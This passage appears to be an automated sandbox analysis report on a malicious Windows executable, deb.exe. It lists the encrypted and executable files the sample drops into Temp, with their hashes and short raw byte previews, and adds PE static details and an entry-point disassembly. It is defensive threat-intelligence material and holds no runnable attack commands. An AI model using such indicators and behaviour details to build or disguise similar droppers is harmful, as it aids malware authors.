                                                      Preview:.u..b......8..t......uX.......]...~.;.t........RQ.7VP./..........]..T)M..M.......xP.t.j.j.h.....pP..H.I.............u.......u!......P......Ph.....7..H.I..M..U.......~.;E.u........RQ.7VP....y....].S.6..t.I......d....u..u..7VS.....j..7..\.I......t.j.j.h.....6..H.I..U.M........SV......M..U......2._^[.......I.".I...I...I.*.I.1.I..I.W.I..............................U...L)M..@)M.SV.u.........W.8..t.j...(M..C.....h.u..Gh..._..^[]...U..SVjDj..8@M.S....j.j..|@M.V..........8@M.D...3.@.d@M.VSf.h@M.3.PPj PPP.u.P....I.^[..t..5|@M...`.I.]...U..S.].VW.}.j.^.W..U.9.............95d)M.|~.T)M........tg9Q.ub.........tT.........;.....t........t:...t5...t0j..1.. .I..T)M............@t........u.j..0..T.I..U.C;.d)M.~..].......95d)M........T)M........tj9Q.ue.......t\.......;.....uM...... uDj..1.. .I..T)M.j.......0.. .I..T)M............@t........u.j..0..T.I..U.F;5d)M...x...j.Sh............H.I._^[]...U..QQ.e...M.SVW..;...]...S.E........}.Y...vph..L.S........Y..CP.....YY....h..L.S.E........Y..CQ...

                                                      C:\Users\user\AppData\Local\Temp\Namely

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):63488
                                                      Entropy (8bit):7.997227857678396
                                                      Encrypted:true
                                                      SSDEEP:1536:Dgeu8c5+shO+lhUWggm6bSVUpnbP31aBMU0yMG5pPhTUDA3Kf:ceEVO+Zggm4GGwNBMG59Kiw
                                                      MD5:FBD4C6BB9391FB26D20506FD6DC01FFF
                                                      SHA1:F7B98777865A2372EC8F09D8675EE676C7C3318A
                                                      SHA-256:1EC64A1390358734BB02501BF8675885F3CE7CEE3C25AB49678AA6235DE7C13E
                                                      SHA-512:F19A9B6002A24F6EB73492DC1C4DCC995C4B7F59DDACB51A93290671AED2125D8ECE600FB2BD5734216E4F11DDA74437C5E2130B6FE99A5A97AD4A7A29DBAFC1
                                                      Malicious:false
                                                      Preview:.~2.i]J...?..%F.V..../..k.3..t...x5u..s..n.[c.../n..k.....o....W.[......6..z.UP...A....0>......)..):..$.x.6...h[~]....'q^..B......5...ST.Y...<...h.}.Or.7.....4..tQn..e.[..L....O....rF.N'....6....;.0d.Z.8.f+.1Xc....e.h...f..jpr.9....PzGw.`.[.'...%nJ...v8.......W"..].R....P.....$.....VB....<%J".u)....>.b...a.wu..Q^Q.`u.*...lt.j..B.l..x.~..y....`.W..X...Z.<..^]......Utz..0...p.,$s!I.AG..}z.. p.E......1....V......;.`..&.....6..-.'-k......Y.].U;...!..[-..K.+L=..L..O..Qy4.,...C........k}.`..HZ%.!=.!......K....~q.G.jj....G.L.ol.....$..........OW..Lh...U..c...ghe,..z....UU....?>J....Uv..v;..{.T}p../.?@.,.z..._.'`G.........L..u.VlL...,.....9.q?..iQsj..M.w*P..W.)...P.l.W.5..._{Ix........ij...g.2[...g...&..[6...q6...w".d..z.k..j)........g.*..#m...gD....~.!I..........!...Xo1a[.Bb.Bi*.wR.....|..=~...../.C{w..........~...Y.c....3."H3,.s....b.Z.....[.....:.t...p6..!6=6.J..h.1@..i5..........QI.3.s.s.X+ q....B...^....piY:7.S..}.../A..$Z.<......#...

                                                      C:\Users\user\AppData\Local\Temp\Premier

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):94076
                                                      Entropy (8bit):7.997971053760013
                                                      Encrypted:true
                                                      SSDEEP:1536:3nW5R64T7dn8NF0pOfZY8qfSnGtpLeVQRzFzULbWwvoR4vu+OVgPryacbBSDeX9n:XsZ7dn8vZlGzLeV4xzULqwpu++UcbBSQ
                                                      MD5:09654DD2D75795DA9BEF73F6D7C477A0
                                                      SHA1:7A78720C567FB49E810E361EE743418BE00A4D1A
                                                      SHA-256:637A0BDEF2D50E640EE34BEC0ADB6EBF4B6AF779AE9742444490553AA16E16AB
                                                      SHA-512:90E7DFFC5B265286BA3F393D51984311AE727CCDB353BBE7C052630680D9E431C2D9DFC158DE12E1AF34FB91723DC0B3597F08148956152369C9237701C0F5D8
                                                      Malicious:false
                                                      Preview:...Y.Hr.j./.s^0..uCh...BY.f$..0....3.....==...%U.........).C..u.U...:.S&..f..w].d...C.w.Q....o.......;..d[...Y:....s....g.{*5a)1>...m...y.$Q....!.b.....*......./....!..m..*..?w..L..b.}.o..k.g[....M.<#.N.'0J...V#hx..j....s$T/...f..^kZ7.....cG..O69v..@E...pzT.jj...>.W.KL\.........%.'*.|Q...I..BJ\B...N.n.@'..s.c-.2jeW.........I..S.#a...P+j..x".Kn...3..~..../K.,.Oh.1F.Lg.x5uN....>e,O.....&...C..7....4 o:_Dw...Yw.^..X.W!.;..|I...8U...A$2Ce..O..F.c.dY3.l0..<N.[sM[F....o....Z.l.T.V.1dFab_.....u}&.K.T0...K..|?.'..#..s....`Cg.p.r...2.p.k.i.C.0.omt.. ^/_'..[...._.e.X..Kv........9.,.tCJ.7.........e*....L/..N;8.u....[....d..4....D.W.@..B.i.i{..}...X.....n7....[.?.dY>n;.{....>..*.......g.i.........,...3.b.y.d..jZ.3-y.oM....{%!.!=.... .j<.QF.~...Y.`.g.?............%...#X6.../<cQTY..*o.a...t.{kH.....x6*.'B.>.H...5.c.\...y...+F..9e>...rC..R.oQ `w..K,...{..8........j._`.@....D|..E.1<..O...........I...?u......3 Y7<.(.2.7....K}X .E@?w.T.<l...

                                                      C:\Users\user\AppData\Local\Temp\Reminder

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):142336
                                                      Entropy (8bit):6.709299852395781
                                                      Encrypted:false
                                                      SSDEEP:3072:uccBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi8Q:uccB3gBmmLsiS+SAhClbfQ
                                                      MD5:1BF35427A4FB34B46E0EFB391EEE2FB0
                                                      SHA1:8727F3434118B183E33DEB137A5CB2C12A51AB40
                                                      SHA-256:AC647FF0823D3781D6A6492D55DA0C8FA715DCD6EE6739C96AFDC2BC49D27B9B
                                                      SHA-512:8C5C73D1FCE516BA92B23F8C676DA77D80FA8777C75DE44BB6A5C356D7BA31BB86CE63C7067AB03DBDCD2A59B4AFB6CA21CC82AD63D29521F379FA91DA21D7B5
                                                      Malicious:false
                                                      Preview:`.L......U..M..:.}......y..z..e...u.VRQ.].S..........t!...u4j..F.P.s......YYP.v.W.1......F.P.s......YYP.v.W......E......M.d......Y_^[..3.@.e..L....U..} .S.].VW.}.t..u SW.u..H.......E,..u....u.P......u$.6.u..u.W......F.@P.u.W....h.....u(.s..u..u.W.u.......8..t.WP.{..._^[].U...TSVW.}.3.W.u..]..u..]..........E......Y...;G...P....u..>csm........~.........~. ...t..~.!...t..~.".........9^........:...9X........,....p..$....E...@..E.........>csm.u*.~..u$.~. ...t..~.!...t..~."...u.9^............9X.tf......@..E.......u.V.X......YY..uD.}.9...y.....].G.h(.M..L...=............M.C....M.;.|..H....U..U....U.E..M..}..M..>csm........~.........~. ...t..~.!...t..~.".....j...9_........u P.E.P.E.P......U.....E..E.U.;U........M.k...E.E...@..E.E.9.......;H........x..@..}..}..E.].........F..@.......U.E...M.E...~+.v..1.u..s........u,.E..M.H....E..M....U.E.E..@.E.;E.t0.E...u.E..u$.E...u .u..0.u.W.u..u..u.V.......,.U.M..E..B.U.;U...&...8].t.j.V....YY8].ue..%....=!...rW9_.u..G .....tH

                                                      C:\Users\user\AppData\Local\Temp\Stewart

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):88064
                                                      Entropy (8bit):7.997999838769318
                                                      Encrypted:true
                                                      SSDEEP:1536:p2rNsGENka6dHSjxL63/ndJBTV2EM2zqqA3bb/ByP5qOv6GueCWqtea:QnEN/6dyjxLsJBR2EXGb5yP5CeCWg
                                                      MD5:9AD816E284CAA0CEA7D662C974651CD7
                                                      SHA1:BDBAE7579D91333AAE508E17DB924D11C27C83B3
                                                      SHA-256:46B15D3873E7335DF9DAD62A07BCE430E2B8D8EF3F519FF5C91EC951C8058CBA
                                                      SHA-512:8684A48FD1D7DEE1138A67F76ECED2616C81EDA293C0725D8D2DC552FCA289026F834E77509C9715953909019D45AD13CEBEA8E822F397BE9E5D1B53045E73B3
                                                      Malicious:false
                                                      Preview:....l.@......>...<...x<..Y,.!@...y].W..Y..B\.|...F5.[.....f......KfL...9.#J..?%.`=...8...j...l.]0..hEk.<bM..@.q...;...IQ[_o..jme..S..~|...q...)..7.~\...J...F.H..L...hqg.<5[rd5...q....G...p. ..FZ).Rp9........%er.|.vJ$@.......;X9.......p......(...lf.L....c3..I~.....h...&.f.....:..0.$....A....O.l..u...........SQ{.QP.l.o.....K...........,1....c;K...`....#..8.YV...c.NE.@.*..x]...0....w.l-.0........O1..vw.e.H....h........2+.......1?.q....;.6.@y..x.7...CL..-~..P.7..%.N.'........5>..8=..$...iKhVV.AW.R...9.H..c..Q7o~.....T#.m..,1.q...... t[GH8......H|.P.............wt..........|.E&....+8.8"..rF.I.r.S.).8.....W.C..E.K<C.......?"2...?1..t.`.I..f./J.t*\6.+B.-.3..N<....g^...|r./..iY........n$G.,#|Rz.{+.E...Z]$5.A$....F..W[..:c..Y.....=.L...A..\.",Q.\...#.M.....-.]..H.......W@.^G...in...j...V>.@..RL.L.O......K...i.-....T............K.Y.vYM5..L..E.H^.r....?.v..n(.?..M.bc.x.....p..U.u.T ...H9.d..Q..H.....i09{?.....9.J.Y,.|c>?.c..T..#Y3.h[#.F.,&..g.

                                                      C:\Users\user\AppData\Local\Temp\Transport

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):146432
                                                      Entropy (8bit):6.566033976296429
                                                      Encrypted:false
                                                      SSDEEP:3072:ZJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u6Z:Z0CThp6vmVnjphfhnvO5bLezWWt/Dd3D
                                                      MD5:2A326DB2D16EC850B130BA3B89A00905
                                                      SHA1:2B9270D781D7ABF1A2C83521F1800AD40D9067B3
                                                      SHA-256:0520EFD0E879F8A9A34D05F1E06D7252865DB2EF26EE98BEA6779D5608180D89
                                                      SHA-512:D788E90D22C6B150766919ED14333C59E681371DDAA8B32DDB7B9C6B170C5BA616A7B77B40F5198D5D6467639A952694429E031DDC15F7AB0A306CAA07DC9408
                                                      Malicious:false
                                                      Preview:..@8.X.V....I..L$H.ko.._^..[..]...U..QS.].VW.E...{..r..C..H..6{....t..E...C..p....T@...F..8.C..0...C@...F....u......Y..u..u.........&..F....._^3.[....U..SV.u.2.~..r..F..H...z....t...F..0....?...N........u..u.......&..F.....^3.[]...U...........d$..SVW..M.h..I..\$.......E..@..0...?...N....D$..A..D$..A..D$..A..L$..D$ ...es...t$..t$.....I..D$...{L.W.D$..N...Y.L$.j.^;.u?..t!.D$.+.........\$.f;.\$.u......u.3...u.jc....f;T$......@..D$...{L.W.D$......Y.L$.;.u?..t!.D$.+.........\$.f;.\$.u......u.3...u.j..,...f;T$......@..D$...{L.W.D$.....Y.L$.;.u/..t!.D$.+.........\$.f;.\$.u_.....u.3..........D$...{L.W.D$..J...Y.L$.;.uL..t!.D$.+.........\$.f;.\$.u!.....u.3...u!j.....f;T$......@.f;T$......@..D$...{L.W.D$......Y.L$.;.u<..t!.D$.+.........\$.f;.\$.u......u.3...u.j..!f;T$......@...{L..L$........t.j.^....|L..L$..............3.ja_.\$HW.L$....h.|L..L$.......t$.....I.;.t...cu&...t!h0.I..L$..2....t$.S.?....D$,...YYG..z~..|$$.\$..........M..7,...O.3.QF..VS.2...d$<..D$4j.VPS.|$D.

                                                      C:\Users\user\AppData\Local\Temp\Understanding

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):76800
                                                      Entropy (8bit):7.99774834665167
                                                      Encrypted:true
                                                      SSDEEP:1536:kpK0VXPIswlaOXklN8yD0CQBxgwrBDCldent3yAEdxpSP388tlhi2nDMw:kbPDdO4eyG1er4iAYxpSPs/sAw
                                                      MD5:464C28CB0D0D1A38EAD3DD487C08B782
                                                      SHA1:8C8F2FE5C34B05E2D353899F3365C3CBD6E7843F
                                                      SHA-256:8779E76010D132C18BCD4BDF9BB14000F738132E2677F71A7DD561AADE6165D4
                                                      SHA-512:5C35AC42E43B8D51C0BE0B0B87E32EEA651D6A493279A2D3F55971FBB38876F21265FFE4CC6AF1CD27E64569AFCAC8120847499FD9944F9DDE6A49C9C8FB7F93
                                                      Malicious:false
                                                      Preview:j.Z...].g.b..........&......7.'.(.....F..K}.*.:\..~"....l....Su'1V...iKC.z.......(.<.0y.G........K.{....3.S.......5..j..$.-.^.B..t\:....$...q..{.!.......$u...*...xEw...x..#Nd.<."....|cz..l.a..........G.6...F..P.\...\...G.5{.A...3C.62..@.{o....$..y&A..'..n.Y.b..&Fx.m.?LI.../...%.....!.....e{..7....C..e..+.. dCb.zv.../..Y..#.>?3.H..\'?.@2.d/c..p..?.E..0d..@%y........*#.d.4.<.M.y<..l.N..@\.......n..?.....c....F.....).B.|...P.{.8@.......{.CxPH.%...<.].j|........?h.`..G.g..[wC./|=.X..b2......@..a...W.......E..,.u.LJ.t.4....Lt...]...7>...D...]..0....xP...4..D..".*....e.].s.....4...m....S.@8.R..s.p...MIIv.'I2.U.W.......= ..C*...-.....2.(..z.L...@e].o/6..,v..`.o.Zk[.......1...2..D.X.....\.0..,........yQ...S.x..o.).N....b...i....6......m^6......lxd..}.......X..(X....h...._0...&P.1n....X$rsI.....a9. X.CM.]....l....[nI.\.(..&zX..7.l.B..Egg3....Q.......w.wV6s-...p..}....K..T.II..f:5..l.g.bR..L...i.A'..{.-'4:.m.x......D.#../>[.amk....JS....X?.h....

                                                      C:\Users\user\AppData\Local\Temp\Universe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64512
                                                      Entropy (8bit):7.997187902407482
                                                      Encrypted:true
                                                      SSDEEP:1536:43DbdeLBZXSvoX39KSwHNCxRfFgR6sQoK1f8fhzItRCFIjg6T/KR:4TYZXSSytGSQ8frMRGR
                                                      MD5:0B59FF434694C6CBA87A40F1AD767C99
                                                      SHA1:9224B783BC87CC606588A3A60AD2A9115FD9F9A0
                                                      SHA-256:EACE451165225CC5207C9037BB8999DC7EEF6A36F44DBA42EA1051AF2DB2CEA0
                                                      SHA-512:50926E7FCE4C16BC5C08CE63C65AFB6968BC355426BB4381005D53424A23EBA6CADBE74833B153EC2C33EA44F409BEB10B7C1B4326A4FE8C516F5CC49C4D0E1F
                                                      Malicious:false
                                                      Preview:.......Zb%ME..]!<u'....m.v.9}.s.g.L0.6..2/..?.......s.....b.V......d.*,X..;. r`.!$.#z..Sn+...SFr..'.a3..V.y.'_<....%..Z...L....9._..b@..f.\.%`...........*...................\..p3.I;&.Q..W...iBg._3.,<....M9r.J..{Z.~.lA...A.|.........=.s'..X.....sTN...o2..nA.1..<>...b.....[.kB]..D.&J.....}.a...j....1...j-}.~.......o.49{.6G..@.t8.u.j..}..5.A...B.:.r...Y.`.........T.^...J....'v...&i.f...V..Q......iZ....R.|...RC..)t.[.c$..i..Q...Y....Z..SA.@=.v.f.E......0..@a%b..G;.3J..f../s%..8.`h...8............s.LT...K.......V....@w.......+.I......B...).._D.::.5>.Z......}.b..v\.....p...o...P..}.W!.z.t.^..M..1Hx.K...?. c....N....n.}.....i..^.b.6...:....T.Y!..."D%k..T4..-..x.C2....c...4..N.o.ev.'.E..~K....s..2..................Y..d.m.E.N(...0..M3.H.u........:..A...7.I...V.X.n.....x.,.5d....|L.H/.[Y....HF.y...h.....?s...Cu.G.%....R.~^....6n....!VF.$-;.i&&....].p....0x../n..8%.L...,.^v..d...f...IPI..>P.^.k.v.S....NJ.4..V...(....s..<~...e_.

                                                      C:\Users\user\AppData\Local\Temp\downloaded_exe.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\deb.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1301562
                                                      Entropy (8bit):7.976745133720472
                                                      Encrypted:false
                                                      SSDEEP:24576:G7PY8tHUPuoV29lyOr7WEM6WosbFVOo33GyGs/7IzAIcUZ2kgXJic:ghtD4A7W6s7/nGyGqEz/cUZyXV
                                                      MD5:22AEFDCE6474D0687748AB51F3DDE0D9
                                                      SHA1:B55A23B4F4D94CB4DB1CCBD1C762E1132E9FBF28
                                                      SHA-256:00F978E0084F97FEEA64023458B25795B3DBD2717CCC2483CF60F6AA712D0556
                                                      SHA-512:13EE29C919B326394970B96B77A856F47C247DFD7372E26ACDFAF688E2D4322D4EB41CB66AC5CF5AF86F78C06525A7B7B468D6C21979D451377894813BAADED9
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.......................................@.................................@.......................R....9...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...............................@..@.reloc...............4..............@..B................................................................................................................................................................................................................................................................................................................

                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                      Download File
                                                      Process:C:\Windows\System32\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.4695485829967865
                                                      Encrypted:false
                                                      SSDEEP:6144:gzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNqjDH5S:2ZHtYZWOKnMM6bFpoj4
                                                      MD5:15CDDA97532718DA96D184F46803745C
                                                      SHA1:27AA8ABDF136922714F4041CB3C7F0D8BED6FE83
                                                      SHA-256:630F1AC5EED58438589332608CF500C12C8FA36DEE76D79E816C47B439A40E8D
                                                      SHA-512:4A894F2E4A93F4BBBB00CD539FBBB63890FB1700581378EC611A1767511641DC0770AC2E9E62D5E9CC4F3D3A4FAC73A186D6B18B591911EE9CDE4CFCD5BE13A6
                                                      Malicious:false
                                                      Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...0.Q..............................................................................................................................................................................................................................................................................................................................................P...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32+ executable (console) x86-64, for MS Windows
                                                      Entropy (8bit):5.992231140800837
                                                      TrID:
                                                      • Win64 Executable Console (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:deb.exe
                                                      File size:2'844'594 bytes
                                                      MD5:176033d9407c87db1083366f6cc0667d
                                                      SHA1:74b24121584544e7450541885078b56c7fe7a8a5
                                                      SHA256:1676766aa84245f0c139b5c38772af13b24a16140c7e552fee00c21784952ad2
                                                      SHA512:6eaa35b2e13638a542597c2c0d3dce919f22c85c6db09212003603a291d682c787ef5f44184cecd45dd0b81757d693eb3fb93098e45084bf84655ecab6805eeb
                                                      SSDEEP:24576:MsNxurfnY/rT9R7lXjYh1gw+pn/U5vEgobCtDS+Ec0xMki8UsU3AodDqC600J4b:MsNxYfnY/rT9llXT9MKJbuDqC600J4b
                                                      TLSH:42D5F94369DB0DE9DED677B4A1D35335A774FD328B2A1F2B6A08C23129536C4AD1EB00
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....iag..........&....+.......................@.............................`......{`,...`... ............................

                                                      File Icon

                                                      Icon Hash:23e3a3abaeb2b8a7

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x140001410
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x140000000
                                                      Subsystem:windows cui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x676169FA [Tue Dec 17 12:09:30 2024 UTC]
                                                      TLS Callbacks:0x4000e1a0, 0x1, 0x4000e180, 0x1, 0x4001c750, 0x1
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:a6eb01b21ed44a83a26ef1be82f4039e

                                                      Entrypoint Preview

                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      dec eax
                                                      mov eax, dword ptr [000D3255h]
                                                      mov dword ptr [eax], 00000000h
                                                      call 00007F3390BC884Fh
                                                      nop
                                                      nop
                                                      dec eax
                                                      add esp, 28h
                                                      ret
                                                      nop dword ptr [eax]
                                                      jmp 00007F3390BE1320h
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      dec eax
                                                      lea ecx, dword ptr [00000009h]
                                                      jmp 00007F3390BC8AA9h
                                                      nop dword ptr [eax+00h]
                                                      ret
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      nop
                                                      push ebp
                                                      push ebx
                                                      mov eax, 00002098h
                                                      call 00007F3390BD6799h
                                                      dec eax
                                                      sub esp, eax
                                                      dec eax
                                                      lea ebp, dword ptr [esp+00000080h]
                                                      dec eax
                                                      mov dword ptr [ebp+00002030h], ecx
                                                      dec eax
                                                      mov dword ptr [ebp+00002038h], edx
                                                      mov dword ptr [esp+20h], 00000000h
                                                      inc ecx
                                                      mov ecx, 00000000h
                                                      inc ecx
                                                      mov eax, 00000000h
                                                      mov edx, 00000001h
                                                      dec eax
                                                      lea eax, dword ptr [000CCB5Bh]
                                                      dec eax
                                                      mov ecx, eax
                                                      dec eax
                                                      mov eax, dword ptr [000FC489h]
                                                      call eax
                                                      dec eax
                                                      mov dword ptr [ebp+00002008h], eax
                                                      dec eax
                                                      cmp dword ptr [ebp+00002008h], 00000000h
                                                      jne 00007F3390BC8B06h
                                                      dec eax
                                                      lea eax, dword ptr [ebp+00001FEEh]
                                                      dec eax
                                                      mov dword ptr [ebp+00001FF8h], eax
                                                      nop
                                                      nop
                                                      dec eax
                                                      lea edx, dword ptr [ebp+00001FEEh]

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xfd0000x140c.idata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1010000x1a2b.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe00000xb4cc.pdata
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1030000x1600.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0xd2ec00x28.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0xfd4e80x470.idata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000xc9f880xca000c5660d9da91d294a98c8121b35b1aa7bFalse0.36434362430383666data6.16713860657559IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .data0xcb0000x20e00x22009b838ee7e311130eeca7b0776fd4b46bFalse0.04067095588235294data0.5388315647833224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rdata0xce0000x114000x11400fa1e033d264e6f89e785f1c6bb765532False0.2021201313405797data4.971228011132291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .pdata0xe00000xb4cc0xb6009041f82d660f35e3e8ed1158b3567241False0.5167839972527473data5.959232264527676IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .xdata0xec0000xfac80xfc00ae02203cc0c167639221ce507b42a57eFalse0.1918402777777778data4.92021980263626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .bss0xfc0000xc700x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .idata0xfd0000x140c0x1600b52b84c0dea76b37bb16a942e5259236False0.3034446022727273data4.323650865003456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .CRT0xff0000x680x200942be0411525401202d1c1060ce27f1aFalse0.076171875data0.36239685604047256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .tls0x1000000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x1010000x1a2b0x1c002e507a45192b5e31f965d4cf16ee0f81False0.7561383928571429data7.1073939845714635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x1030000x16000x160089088be637a9fcfb8ce8d16620c72d2eFalse0.4074928977272727data5.446169829296724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      /40x1050000xa300xc009b260df650d622bcf805cc02c7961f5aFalse0.19075520833333334data1.7185222223578178IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      /190x1060000x18fd30x190009bacba70a1bdc0578e3c25ecd4843412False0.416337890625data5.809615466055802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      /310x11f0000x4dd40x4e003cfbe84364ae0b36d9bff4633fb09150False0.2251101762820513data4.84552781966147IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      /450x1240000xb4990xb600e3e58513a46454b87e64837feb54e495False0.503176510989011data5.027382072754182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      /570x1300000x1fe00x20002c7b5bf12029387cad814c9d14db2b4aFalse0.2802734375data4.611481437556552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      /700x1320000x3d20x40014ef477196f4ba66a23cdec12676e5afFalse0.451171875data4.713819195319815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      /810x1330000x335f0x340028c39c78c2598b1e80dde20022bc5145False0.107421875data4.923329796728514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      /970x1370000xde7c0xe000aa0bb1328ac8c3cfe5f83540b810b6e0False0.5066615513392857data5.921973685179868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      /1130x1450000x68f0x8007417da38326912733ecee1ecf14dddffFalse0.62353515625data5.280213974956014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x1011140x1472PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.903706534199465
                                                      RT_GROUP_ICON0x1025880x14data1.05
                                                      RT_MANIFEST0x10259c0x48fXML 1.0 document, ASCII text0.40102827763496146

                                                      Imports

                                                      DLLImport
